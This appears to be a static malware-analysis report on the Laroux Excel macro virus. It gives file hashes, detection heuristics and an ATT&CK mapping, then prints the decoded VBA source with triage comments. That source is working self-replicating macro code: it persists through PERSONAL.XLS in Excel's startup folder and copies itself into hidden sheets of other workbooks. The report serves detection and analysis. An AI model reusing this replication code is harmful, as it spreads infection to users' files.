Xls.Trojan.Laroux-15 — Office (OLE) malware analysis

Static analysis result for SHA-256 1472bfb3ab6da3b6…

MALICIOUS

Office (OLE)

38.5 KB Created: 1998-09-23 12:54:48 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 86c1dc5672f80da3cb5e6ef986467b7b SHA-1: 26c6f065ec89b64d058fccf0c5ca0ebd2914af66 SHA-256: 1472bfb3ab6da3b6514674d216b9442c6c3c76ffe1ec703f11f835c35be537f1
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-15 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

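The sample is identified as the Laroux macro virus, a known Excel-based threat. Its auto_open macro registers the larouXYZ routine as Excel's OnSheetActivate handler. That routine saves a copy of the macro sheet as PERSONAL.XLS in Excel's startup folder (Application.StartupPath), ensuring execution whenever Excel is launched, and copies the sheet into workbooks that do not already carry it. Persistence therefore comes from Excel's own startup directory rather than from a Windows registry Run key or the Windows Startup folder; ATT&CK T1137 (Office Application Startup) appears to describe this mechanism more closely than T1547.001.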

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-15 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-15
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Document defines an auto_open procedure, which Excel runs automatically when the workbook is opened.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15086 bytes
SHA-256: 40ca00f337e7e95cb890baf5ec1393f3742cba663c7fa352950955d19f62b02e
Detection
ClamAV: Xls.Trojan.Laroux-15
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Analyst note: module header of the extracted macro. The module name "larouXYZ"
' is the same string the code below uses for the sheet name and for the
' OnSheetActivate handler target, so it is a stable string to pivot on during triage.
Attribute VB_Name = "larouXYZ"


Option Explicit

' Entry point. Excel runs a procedure named auto_open when the workbook is opened.
' The only statement here registers larouXYZ as the Application-level
' OnSheetActivate handler; the replication logic itself is in larouXYZ.
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Analyst note: an assignment to Application.OnSheetActivate inside auto_open
    ' is a useful static indicator, because the named routine then runs on sheet
    ' activation without any further user action.
    Application.OnSheetActivate = "larouXYZ.larouXYZ"
End Sub

' Replication routine, invoked as the OnSheetActivate handler set in auto_open.
' What the visible code does, in order:
'   1. If no PERSONAL.XLS is found under Application.StartupPath, save a copy of
'      the "larouXYZ" sheet there under that name.
'   2. Otherwise, if the first sheet of the current workbook is not "larouXYZ",
'      copy that sheet from PERSONAL.XLS in front of the workbook's first sheet.
'   3. Every eighth time the counter step is reached, call Print_larouXYZ.
'   4. Point the handler at the PERSONAL.XLS copy, hide the window and sheet,
'      and mark both workbooks as saved.
' Triage pointers: a PERSONAL.XLS in the Excel startup folder and a hidden
' first sheet named "larouXYZ" in workbooks opened on the affected host.
Sub larouXYZ()
    ' Any runtime error jumps to the label at the bottom, which exits silently.
    On Error GoTo larouXYZ_Error
    Dim Temp As String
    ' Static: the counter keeps its value between calls of this routine.
    Static Cnt As Integer
    
    ' Screen redraw is switched off while sheets and workbooks are manipulated.
    Application.ScreenUpdating = False
    
    ' Dir$ returns "" when no matching file exists, so this branch runs only
    ' when the startup folder does not yet hold a PERSONAL.XLS.
    If Dir$(Application.StartupPath & "\" & "PERSONAL.XLS") = "" Then
        ' Sheet.Copy without a destination places the copy in a new workbook,
        ' which becomes the active one (standard Excel behaviour); its name is
        ' captured in Temp so it can be saved below.
        Sheets("larouXYZ").Copy
        Temp = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        ' The new workbook is written into Excel's startup path as PERSONAL.XLS
        ' with empty passwords and no backup copy.
        Workbooks(Temp).SaveAs Filename:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
                , Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
    Else
        ' PERSONAL.XLS already exists: the check on the first sheet's name keeps
        ' the sheet from being inserted again into a workbook that already has it.
        If Sheets(1).Name <> "larouXYZ" Then
            Workbooks("PERSONAL.XLS").Sheets("larouXYZ").Copy Before:=ActiveWorkbook.Sheets(1)
        End If
    End If
    
    ' Counter-gated call: Print_larouXYZ runs once the counter exceeds 7, then
    ' the counter starts again from 0.
    Cnt = Cnt + 1
    If Cnt > 7 Then
        Cnt = 0
        Print_larouXYZ
    End If
    
    ' From here on the handler refers to the copy inside PERSONAL.XLS, whose
    ' window is hidden. Setting Saved = True marks the workbook as having no
    ' unsaved changes, so Excel does not prompt to save it.
    Application.OnSheetActivate = "PERSONAL.XLS!larouXYZ.larouXYZ"
    Windows("PERSONAL.XLS").Visible = False
    Workbooks("PERSONAL.XLS").Saved = True
    
    ' The macro sheet in the current workbook is hidden and the workbook is
    ' likewise flagged as saved.
    Sheets("larouXYZ").Visible = False
    ActiveWorkbook.Saved = True
    
    Application.ScreenUpdating = True
    
    Exit Sub
    
larouXYZ_Error:
    ' Error path: leaves without any message. ScreenUpdating is not restored
    ' to True on this path.
    
    Exit Sub
    
End Sub

Sub Print_larouXYZ()
Attribute Print_larouXYZ.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Print_larouXYZ_Error
    Const MAX_COL = 62
    Const MAX_ROW = 38
    Dim Title(0 To MAX_ROW - 1) As String
    Dim Row As Integer
    Dim Col As Integer
    
    Cells.ColumnWidth = 1
    Cells.RowHeight = 7
    Cells(1, 1) = "larouXYZ Ver0.01"
    
    Title(0) = "11111000000000000000000000000000000000000000000000000000000000"
    Title(1) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(2) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(3) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(4) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(5) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(6) = "01111000000111111000001111100111000001111110000011111001111100"
    Title(7) = "01111000011000111100000111101111100011100111000001111000111100"
    Title(8) = "01111000111000011110000111110111100111000011100001111000111100"
    Title(9) = "01111000111100011110000111100011001111000011110001111000111100"
    Title(10) = "01111000011000011110000111100000001111000011110001111000111100"
    Title(11) = "01111000000001111110000111100000001111000011110001111000111100"
    Title(12) = "01111000000110011110000111100000001111000011110001111000111100"
    Title(13) = "01111000011100011110000111100000001111000011110001111000111100"
    Title(14) = "01111000111100011110000111100000001111000011110001111000111100"
    Title(15) = "01111000111100111110000111100000000111000011100001111001111100"
    Title(16) = "01111000111111011111000111100000000011100111000001111111111100"
    Title(17) = "11111100011110001110001111110000000001111110000000111110111110"
    Title(18) = "00000000000000000000000000000000000000000000000000000000000000"
    Title(19) = "00000000000000000000000000000000000000000000000000000000000000"
    Title(20) = "00011111111100111111100111111110000011111001111111111111100000"
    Title(21) = "00000111110000001110000011111000000000110001110000001111000000"
    Title(22) = "00000111110000001000000001111100000000100001100000011111000000"
    Title(23) = "00000011111000010000000000111100000001100001100000111110000000"
    Title(24) = "00000001111000010000000000011110000001000001000000111100000000"
    Title(25) = "00000000111100100000000000011110000010000000000001111100000000"
    Title(26) = "00000000111111000000000000001111000010000000000001111000000000"
    Title(27) = "00000000011110000000000000001111000100000000000011111000000000"
    Title(28) = "00000000011111000000000000000111101000
... (truncated)